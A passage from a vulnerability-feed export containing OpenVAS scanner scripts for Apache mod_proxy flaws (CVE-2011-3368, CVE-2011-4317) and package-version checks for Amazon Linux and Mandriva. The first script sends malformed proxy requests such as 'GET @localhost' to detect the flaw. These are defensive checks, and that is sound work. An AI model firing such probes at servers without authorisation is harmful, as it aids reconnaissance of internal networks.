Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:http_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103293\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_bugtraq_id(49957, 50802);\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-4317\");\n script_tag(name:\"creation_date\", value:\"2011-10-11 17:46:33 +0200 (Tue, 11 Oct 2011)\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Web Servers\");\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_apache_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/49957\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Oct/232\");\n\n script_tag(name:\"summary\", value:\"Apache HTTP Server is prone to an information disclosure\n vulnerability.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this vulnerability to gain access to sensitive\n information.\");\n\n script_tag(name:\"solution\", value:\"The vendor released an update. 
Please see the references for details.\");\n\n script_tag(name:\"qod_type\", value:\"remote_probe\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) )\n exit( 0 );\n\nif( ! loc = get_app_location( cpe:CPE, port:port ) )\n exit( 0 ); # To have a reference to the detection VT\n\nbanner = http_get_remote_headers( port:port );\nif( ! banner || \"Apache\" >!< banner )\n exit( 0 );\n\nreq = http_get( item:\"/\", port:port );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\nif( ! res || res =~ \"^HTTP/1\\.[01] 50[23]\" || ( res =~ \"^HTTP/1\\.[01] 200\" && \"Bad Gateway\" >< res ) )\n exit( 0 );\n\nreq = 'GET @localhost HTTP/1.0\\r\\n\\r\\n';\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( ereg( pattern:\"^HTTP/1\\.[01] 400\", string:res ) )\n exit( 99 ); # 400 means not vulnerable\n\nip3 = \"5555.6666.7777.8888\";\nreq = \"GET @\" + ip3 + ' HTTP/1.0\\r\\n\\r\\n';\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( ereg( pattern:\"^HTTP/1\\.[01] 200\", string:res ) && \"Bad Gateway\" >< res ||\n ereg( pattern:\"^HTTP/1\\.[01] 502\", string:res ) ) {\n security_message( port:port );\n exit( 0 );\n}\n\n# CVE-2011-4317\nreq = 'GET @localhost::65535 HTTP/1.0\\r\\n\\r\\n';\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( ereg( pattern:\"^HTTP/1\\.[01] 503\", string:res ) ) {\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-03-17T23:03:53", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2011-9)", "bulletinFamily": 
"scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3348"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120513", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120513\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 11:27:36 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2011-9)\");\n script_tag(name:\"insight\", value:\"It was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. 
In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368) It was discovered that mod_proxy_ajp incorrectly returned an Internal Server Error response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3348)\");\n script_tag(name:\"solution\", value:\"Run yum update httpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2011-9.html\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3348\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.21~1.19.amzn1\", 
rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-01-13T00:00:00", "type": "openvas", "title": "Mandriva Update for apache MDVSA-2012:003 (apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2011-3368"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache MDVSA-2012:003 (apache)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:003\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831523\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-13 10:49:33 +0530 (Fri, 13 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"MDVSA\", value:\"2012:003\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3368\", \"CVE-2011-4317\");\n script_name(\"Mandriva Update for apache MDVSA-2012:003 (apache)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(2011\\.0|mes5\\.2|2010\\.1)\");\n script_tag(name:\"affected\", value:\"apache on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name : \"insight\", value : \"Multiple vulnerabilities have been found and corrected in apache:\n Integer overflow in the ap_pregsub function in server/util.c in 
the\n Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21,\n when the mod_setenvif module is enabled, allows local users to gain\n privileges via a .htaccess file with a crafted SetEnvIf directive,\n in conjunction with a crafted HTTP request header, leading to a\n heap-based buffer overflow (CVE-2011-3607).\n\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision\n 1179239 patch is in place, does not properly interact with use of (1)\n RewriteRule and (2) ProxyPassMatch pattern matches for configuration\n of a reverse proxy, which allows remote attackers to send requests\n to intranet servers via a malformed URI containing an \\@ (at sign)\n character and a : (colon) character in invalid positions. NOTE: this\n vulnerability exists because of an incomplete fix for CVE-2011-3368\n (CVE-2011-4317).\n\n The updated packages have been patched to correct these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.21~0.4\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:29", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1259-1", "cvss3": {}, "published": "2011-11-11T00:00:00", "type": "openvas", "title": "Ubuntu Update for apache2 USN-1259-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-1176", "CVE-2011-3348"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840798", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840798", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1259_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for apache2 USN-1259-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the 